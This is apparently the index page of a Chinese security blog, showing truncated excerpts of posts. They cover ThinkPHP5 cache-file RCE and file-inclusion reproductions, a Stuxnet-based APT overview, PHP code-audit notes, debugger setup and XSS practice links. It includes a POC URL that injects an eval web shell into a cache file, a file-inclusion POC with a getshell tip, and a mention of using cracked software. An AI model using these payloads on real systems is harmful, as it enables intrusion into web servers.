主要参考资料:
https://github.com/Mochazz/ThinkPHP-Vuln/
RCE1(利用缓存文件GetShell从而RCE)相关参考资料:https://www.cnblogs.com/zpchcbd/p/12546340.html
POC1http://thinkphp5:8888/public/?username=test%0d%[email protected]($_GET[_]);//
漏洞概述
漏洞存在于 ThinkPHP 的缓存类中。该类会将缓存数据通过序列化的方式,直接存储在 .php 文件中...
《透视APT》网络空间中的对抗APT的典型事件之——“震网病毒”
目标系统:工控系统
潜伏渗透:感染了伊朗境内60%的PC
突破物理隔离:U盘(病毒检测到宿主机插上U盘则主动向U盘感染病毒)
技术水平:同时利用多个0day(微软和西门子工控系统),体现了APT的高级性
攻击者:极有可能是敌对关系的政治势力
攻击持续性:C2服务器2005.11就完成注册,可能长达6~7年
APT攻击的概念
起源
由美国一名空军上校2006年提出
何时引起关注、高潮
2010伊朗震网病毒、2013美国”棱镜门”事件
定义
知名第三方机构
维基百科、Mandiant、赛门铁克、Dambal...
[toc]
ThinkPHP5文件包含漏洞POC1/public/index.php/index/index?cacheFile=favicon.ico
可配合文件上传图片马,GetShell。(PHP 文件包含都讲文件当做php后缀文件进行解析,与实际文件类型无关)
漏洞概述漏洞存在于 ThinkPHP 模板引擎中,在加载模版解析变量时存在变量覆盖问题,而且程序没有对数据进行很好的过滤,最终导致 文件包含漏洞 的产生。
变量覆盖漏洞
https://www.cnblogs.com/wangtanzhi/p/12748967.ht...
[toc]
参考资料:https://github.com/Mochazz/ThinkPHP-Vuln
环境准备:
PHPStorm + MAMP PRO
环境搭建可以看我前两篇文章。
composer
12brew install composercomposer config -g repo.packagist composer https://mirrors.aliyun.com/composer/
获取复现代码
1composer create-project --prefer-dist topthink/think...
[TOC]
参考资料:
代码审计常见的三种方法(PHP篇)
PHP代码审计初次尝试之新秀企业网站系统
审计思路通过脑图大概总结如下:
了解系统CMS名称:新秀企业网站系统PHP版
看着界面就知道是用于企业打广告(x)和发布信息,招聘等功能的系统。且存在前台用户登录和后台管理系统。存在搜索功能。
防护策略IP登录限制 - 猜测伪造IP注入限制了前台、后台的登录次数限制、注册限制、可能会影响到后面SQL注入漏洞的测试。
可能出现的漏洞:伪造IP进行注入攻击
数据库监控,在注册的地方看看ip 是否被带入了数据库。
1select * from php_shisiusafe where ...
[toc]
环境搭建环境配置参考文章:https://www.sqlsec.com/2020/07/macphp.html#toc-heading-2
所需App:
MAMP PRO ,我是在Google 里找的Cracked Version
PHPStorm / Vscode
MAMP 中的 php.ini 设置
在切换php版本时需添加如下内容,免得debug 环境出错。
1234567xdebug.remote_enable=1xdebug.remote_host=localhostxdebug.remote_port=9000xdebug.rem...
xss:http://xssaq.com/wooyun/
xss 练习平台:http://xss-quiz.int21h.jp/
